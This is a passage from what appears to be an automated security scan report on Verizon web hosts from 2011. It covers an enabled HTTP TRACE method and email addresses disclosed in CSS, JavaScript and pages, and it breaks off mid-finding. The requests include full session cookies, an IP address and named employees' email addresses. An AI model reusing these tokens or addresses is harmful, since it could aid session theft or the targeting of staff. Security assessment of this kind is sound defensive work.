
Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


18.1. http://s.xp1.ru4.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /

Request

TRACE / HTTP/1.0
Host: s.xp1.ru4.com
Cookie: 7e34168ea95620a7

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:14:31 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: s.xp1.ru4.com
Cookie: 7e34168ea95620a7; X1ID=BO-00000000521444319; O1807966=768; P1807966=c3N2X2MzfFl8MTMxMjc2OTY3N3xzc3ZfYnxjM3wxMzEyNzY5Njc3fHNzdl8xfDI4NTQ0NTM5OHwxMzEyNzY5Njc3fA==; M62795-97956=1; 1621610-B22941263=0|0|0|0|0|22946267|22
...[SNIP]...

18.2. http://www.verizonwireless.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.verizonwireless.com
Cookie: 7d5371dd4ddf41d

Response

HTTP/1.1 200 OK
Server: None
Date: Mon, 05 Sep 2011 22:14:30 GMT
Content-type: message/http
Content-length: 427
Connection: keep-alive

TRACE / HTTP/1.0
Host: www.verizonwireless.com
Cookie: 7d5371dd4ddf41d; JSESSIONIDB2C=j6fhTlJFv6JCWtlSlB7JQG28QLChh2W1b7QTf9cVB51pQnFmLBtG!-1538644045!ozzy!5104!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6575345525d5f4f58455e445a4a4225c0; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f5
...[SNIP]...

19. Email addresses disclosed
There are 27 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


19.1. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/css/generalWH.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/includes/css/generalWH.css

Issue detail

The following email address was disclosed in the response:

Request

GET /enterprisesolutions/staticcontent/includes/css/generalWH.css HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/css
Last-Modified: Sun, 17 Jul 2011 07:10:56 GMT
ETag: W/"2cdb-4e228b00"
Vary: accept-encoding
Cache-Control: private, max-age=22024
Date: Mon, 05 Sep 2011 22:22:40 GMT
Content-Length: 11483
Connection: keep-alive

/*-- Verizon Business Proprietary and Confidential --*/
/*-- Verizon Business Customer Center **** GENERAL CSS v1.6 --*/
/*-----------------------------------------------------*/
/* -- last updated 12/07/10 -----------------*/
/* Do NOT use inline styles or make changes to this file.
   Email Kathy Lau (katherine.lau@verizonbusiness.com to request changes */

/* -- General Formatting ------------------------------------------------------------ */
* {
   margin: 0;
   padding: 0;
}
/* special id for the body tag of an iFrame */
#iframe{

...[SNIP]...

19.2. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/css/print.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/includes/css/print.css

Issue detail

The following email address was disclosed in the response:

Request

GET /enterprisesolutions/staticcontent/includes/css/print.css HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/css
Last-Modified: Sun, 17 Jul 2011 07:10:56 GMT
ETag: W/"3a7-4e228b00"
Vary: accept-encoding
Content-Length: 935
Date: Mon, 05 Sep 2011 22:22:50 GMT
Connection: keep-alive

/*-- Verizon Business Proprietary and Confidential --*/
/*-- PRINT CSS - should be included on all pages --*/
/*-- Hides certain elements when printing --*/
/* -- last updated 5/12/08 ---*/
/* Do NOT use inline styles or make changes to this file.
   Email Kathy Lau (kathy.lau@core.verizon.com to request changes */

/* ------ Header Classes ------ */
#headerNavTop, #headerBkgrd, #headerTabs, #headerBkgrdAnon, #loginBkgrd, .headerNavBkg { display:none;}

/* ------ CONTENT SPECIFIC styles -
...[SNIP]...

19.3. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/includes/css/theme-vzw-RW.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/includes/css/theme-vzw-RW.css

Issue detail

The following email address was disclosed in the response:

Request

GET /enterprisesolutions/staticcontent/includes/css/theme-vzw-RW.css HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/css
Last-Modified: Sun, 17 Jul 2011 07:10:56 GMT
ETag: W/"d1ad-4e228b00"
Vary: accept-encoding
Content-Length: 53677
Date: Mon, 05 Sep 2011 22:22:40 GMT
Connection: keep-alive

/*-- Verizon Business Proprietary and Confidential --*/
/*-- DEFAULT THEME for VEC: includes Launched app, popup, header, footer, buttons, tabs, box color styles --*/
/*-- Must be used along with generalWH.css to ensure proper page display --*/
/* --v1.16 last updated 12/07/10 ---*/

/* Do NOT use inline styles or make changes to this file.
   Email Kathy Lau (katherine.lau@verizonbusiness.com to request changes */

/* vzb.com progress bar style */
.vzbProgBar{
   position:relative;
   width: 100%;
   overflow:hidden;
   margin-bottom: 20px;
}
.vzbProgBar ul{
   clear:left;
   padding: 0;
   list-style:
...[SNIP]...

19.4. http://headlines.verizon.com/headlines/resources/js/tabber_ajax.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/resources/js/tabber_ajax.js

Issue detail

The following email address was disclosed in the response:

Request

GET /headlines/resources/js/tabber_ajax.js HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Sat, 29 Dec 2007 03:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: application/x-javascript
Content-Length: 16051
Date: Mon, 05 Sep 2011 22:42:35 GMT
Connection: close
Vary: Accept-Encoding

/*==================================================
$Id: tabber_ajax.js,v 1.2 2007/12/28 21:31:30 lmehta Exp $
tabber.js by Patrick Fitzgerald pat@barelyfitz.com

Documentation can be found at the following URL:
http://www.barelyfitz.com/projects/tabber/

License (http://www.opensource.org/licenses/mit-license.php)

Copyright (c) 2006 Patrick Fi
...[SNIP]...

19.5. http://newscenter.verizon.com/components/print/printer-friendly.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newscenter.verizon.com
Path:   /components/print/printer-friendly.js

Issue detail

The following email address was disclosed in the response:

Request

GET /components/print/printer-friendly.js HTTP/1.1
Host: newscenter.verizon.com
Proxy-Connection: keep-alive
Referer: http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297; JSESSIONID=abcEBYCpNovpd9FINW7it

Response

HTTP/1.1 200 OK
Xet-Cookie:
Age: 161
Date: Mon, 05 Sep 2011 22:40:34 GMT
Cache-Control: public
Content-Length: 1523
Connection: Keep-Alive
Via: NS-CACHE-6.0: 62
ETag: "+svswbyfZ0o"
Server: Resin/3.1.8
Last-Modified: Thu, 03 Sep 2009 05:05:22 GMT
Content-Type: application/x-javascript; charset=UTF-8

/**
* @author Michael Pih (mpih@getactive.com)
* @version $Id: printer-friendly.js,v 1.2 2009/08/13 05:53:20 mpih Exp $
**/


/**
* Redirects or pops open a new window to the printer-friendly mode of the page.
* The original request URI and
...[SNIP]...

19.6. http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newscenter.verizon.com
Path:   /fact-sheets/verizon-high-speed-internet.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /fact-sheets/verizon-high-speed-internet.html HTTP/1.1
Host: newscenter.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=U1BlTuKkG8bkiAKp37G7Cg&start=20&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:43:14 GMT
Set-Cookie: NSC_dnt_900_qvc=ffffffff09041e0f45525d5f4f58455e445a4a4214f4;expires=Mon, 05-Sep-2011 23:43:14 GMT;path=/;httponly
Content-Length: 125028

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="generator" content="Convio CMS" />
<script language="JavaScrip
...[SNIP]...
<a href="mailto:bob.elek@verizon.com">bob.elek@verizon.com</a>
...[SNIP]...
<a href="mailto:william.kula@verizon.com">william.kula@verizon.com</a>
...[SNIP]...

19.7. http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://surround.verizon.com
Path:   /Shop/Utilities/verizonyourdomain.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Shop/Utilities/verizonyourdomain.aspx HTTP/1.1
Host: surround.verizon.com
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; vsrecentsearches=wss~xss~xss%20sq~~; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Mon, 05 Sep 2011 22:21:43 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: quhboZ2MfIRqG-pa__lcCIup88pAltrZVy8ew4aQLHKqTD3B8Z1BOKvlmqD24bzzTmCnb-zIHNG5S4jviu2h1eozOODIgWJs1Mt7wWobBpS3hC580=; path=/
Set-Cookie: IOOrderPg=/Shop/Utilities/verizonyourdomain.aspx; path=/
Set-Cookie: tvState=Y; path=/
Set-Cookie: tvNodeName=Utilities&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;; path=/
Content-Length: 138234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >

<head>

<title>
...[SNIP]...
<li>Nine custom email addresses (you@yourname.com)<br />
...[SNIP]...

19.8. http://webmail.verizon.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizon.com
Path:   /signin/

Issue detail

The following email address was disclosed in the response:

Request

GET /signin/ HTTP/1.1
Host: webmail.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; BTagRequired=N

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=2"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:18:35 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:18:35 GMT
Content-Length: 17185


<html>
<head>
   <title>Verizon | My Verizon 2.0 | Webmail</title>
   

   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta HT
...[SNIP]...
<span class="sponsorCopy"> ex: jdoe@verizon.net</span>
...[SNIP]...

19.9. http://webmail.verizon.net/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizon.net
Path:   /signin/

Issue detail

The following email address was disclosed in the response:

Request

GET /signin/ HTTP/1.1
Host: webmail.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=2"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:19:04 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.net; Path=/
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:19:03 GMT
Content-Length: 19268


<html>
<head>
   <title>Welcome to Verizon Webmail</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta NAME="DCS.dcsid" CONTEN
...[SNIP]...
<span class="sponsorCopy"> ex: jdoe@verizon.net</span>
...[SNIP]...

19.10. http://webmail.verizon.net/signin/Login.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizon.net
Path:   /signin/Login.jsp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /signin/Login.jsp?src=SAM&err=1011 HTTP/1.1
Host: webmail.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=284C4BA4247C07559CC0CBDE7C05939B; webmail_ad="ad=1"; lob=webmail; WT_FPC=id=2a58c7583c8b5978c401315268334507:lv=1315268334507:ss=1315268334507; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; amlbcookie=03

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=1"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:39:25 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.net; Path=/
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:39:25 GMT
Content-Length: 19468


<html>
<head>
   <title>Welcome to Verizon Webmail</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta NAME="DCS.dcsid" CONTEN
...[SNIP]...
<span class="sponsorCopy"> ex: jdoe@verizon.net</span>
...[SNIP]...
<td class="descRow" width="541" height="33">you@thenameyouwanted.com</td>
...[SNIP]...

19.11. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizonemail.net
Path:   /webmail/servlet/HttpNimletDriver

Issue detail

The following email addresses were disclosed in the response:

Request

GET /webmail/servlet/HttpNimletDriver?nimlet=LoginNimlet&site=B HTTP/1.1
Host: webmail.verizonemail.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizonemail.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

